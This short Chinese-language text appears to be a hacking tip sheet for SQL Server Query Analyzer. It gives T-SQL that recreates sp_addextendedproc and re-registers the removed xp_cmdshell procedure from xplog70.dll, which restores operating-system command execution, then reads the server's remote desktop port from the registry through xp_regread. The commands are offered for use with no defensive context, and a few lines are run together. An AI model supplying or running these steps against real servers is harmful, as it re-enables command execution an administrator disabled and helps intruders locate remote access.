SQL查询分析器连接
先执行:create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
再执行
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
简单的恢复方法:
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
查询分析器查看终端端口:
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'